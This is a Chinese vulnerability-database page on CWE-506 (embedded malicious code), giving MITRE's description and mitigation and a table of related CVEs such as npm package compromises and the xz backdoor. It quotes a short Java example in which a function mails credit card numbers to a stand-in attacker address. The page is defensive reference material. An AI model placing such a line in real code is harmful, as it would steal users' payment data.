目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1336

100%

CWE-506 内嵌的恶意代码 类漏洞列表 97

CWE-506 内嵌的恶意代码 类弱点 97 条 CVE 漏洞汇总,含 AI 中文分析。

CWE-506指嵌入式恶意代码,属于软件内部植入的隐蔽后门或逻辑炸弹。攻击者通常利用开发者故意插入的代码,在特定条件触发时窃取数据或破坏系统,从而绕过正常安全机制。开发者应通过严格的代码审查、静态分析工具检测异常逻辑,并实施最小权限原则,确保代码来源可信且无未授权的后门植入,以从根本上杜绝此类内部威胁。

MITRE CWE 官方描述
CWE:CWE-506 嵌入式恶意代码(Embedded Malicious Code) 英文:该产品包含本质上看似恶意的代码。 恶意缺陷(Malicious flaws)拥有多种形象化的名称,包括特洛伊木马(Trojan horse)、陷阱门(trapdoor)、时间炸弹(timebomb)和逻辑炸弹(logic-bomb)。开发人员可能会插入恶意代码,意图在未来某个时刻颠覆产品或其宿主系统的安全性。它通常指执行有用服务,但以用户未预期的方式利用程序用户权限的程序。
常见影响 (1)
Confidentiality, Integrity, Availability Execute Unauthorized Code or Commands
缓解措施 (1)
Implementation, Operation Remove the malicious code and start an effort to ensure that no more malicious code exists. This may require a detailed review of all code, as it is possible to hide a serious attack in only one or two lines of code. These lines may be located almost anywhere in an application and may have been intentionally obfuscated by the attacker.
代码示例 (1)
In the example below, a malicous developer has injected code to send credit card numbers to the developer's own email address.
boolean authorizeCard(String ccn) { // Authorize credit card. ... mailCardNumber(ccn, "evil_developer@evil_domain.com"); }
Bad · Java
CVE ID 标题 CVSS 风险等级 Published
CVE-2025-10894 Nx 安全漏洞 9.6 Critical 2025-09-24
CVE-2025-59145 color-name 安全漏洞 — color-name 6.1AI Medium AI 2025-09-15
CVE-2025-59331 node-is-arrayish 安全漏洞 — node-is-arrayish 8.2AI High AI 2025-09-15
CVE-2025-59330 node-error-ex 安全漏洞 — node-error-ex 8.2AI High AI 2025-09-15
CVE-2025-59162 color-convert 安全漏洞 — color-convert 5.4AI Medium AI 2025-09-15
CVE-2025-59142 Color-String 安全漏洞 — color-string 8.2AI High AI 2025-09-15
CVE-2025-59144 debug 安全漏洞 — debug 6.1AI Medium AI 2025-09-15
CVE-2025-59143 color 安全漏洞 — color 6.1AI Medium AI 2025-09-15
CVE-2025-59141 simple-swizzle 安全漏洞 — node-simple-swizzle 6.1AI Medium AI 2025-09-15
CVE-2025-59140 Backslash 安全漏洞 — node-backslash 6.1AI Medium AI 2025-09-15
CVE-2025-59039 Prebid Universal Creative 安全漏洞 — prebid-universal-creative 9.8AI Critical AI 2025-09-09
CVE-2025-59038 Prebid.js 安全漏洞 — Prebid.js 8.2AI High AI 2025-09-09
CVE-2025-59037 DuckDB 安全漏洞 — duckdb-node 9.1AI Critical AI 2025-09-09
CVE-2025-8217 Amazon Q Developer Visual Studio Code extension 安全漏洞 — Q Developer VS Code Extension 4.0 Medium 2025-07-30
CVE-2025-54313 eslint-config-prettier 安全漏洞 — eslint-config-prettier 7.5 High 2025-07-19
CVE-2025-32965 xrpl.js 安全漏洞 — xrpl.js 7.5 - 2025-04-22
CVE-2025-30154 Reviewdog 安全漏洞 — reviewdog 8.6 High 2025-03-19
CVE-2025-30066 changed-files 安全漏洞 — changed-files 8.6 High 2025-03-15
CVE-2024-4978 Justice AV Solutions Viewer 安全漏洞 — Viewer 8.4 High 2024-05-23
CVE-2024-3094 xz 安全漏洞 10.0 Critical 2024-03-29
CVE-2023-2003 Unitronics Vision1210 安全漏洞 — Vision1210 9.1 Critical 2023-07-13
CVE-2021-22887 Pulse Secure PSA5000 and PSA7000 安全漏洞 — PSA5000, PSA7000 5.7 - 2021-03-16
CVE-2020-15165 Chameleon Mini Live Debugger 安全漏洞 — ChameleonMiniLiveDebugger 9.3 Critical 2020-08-28
CVE-2017-16072 nodemailer.js 安全漏洞 — nodemailer.js node module 7.5 - 2018-06-07
CVE-2017-16068 ffmepg 安全漏洞 — ffmepg node module 7.5 - 2018-06-07
CVE-2017-16071 nodemailer.js 安全漏洞 — nodemailer-js node module 7.5 - 2018-06-07
CVE-2017-16070 nodecaffe 安全漏洞 — nodecaffe node module 7.5 - 2018-06-07
CVE-2017-16069 nodeffmpeg 安全漏洞 — nodeffmpeg node module 7.5 - 2018-06-07
CVE-2017-16067 node-opencv 安全漏洞 — node-opencv node module 7.5 - 2018-06-07
CVE-2017-16066 opencv.js 安全漏洞 — opencv.js node module 7.5 - 2018-06-07

CWE-506(内嵌的恶意代码) 是常见的弱点类别,本平台收录该类弱点关联的 97 条 CVE 漏洞。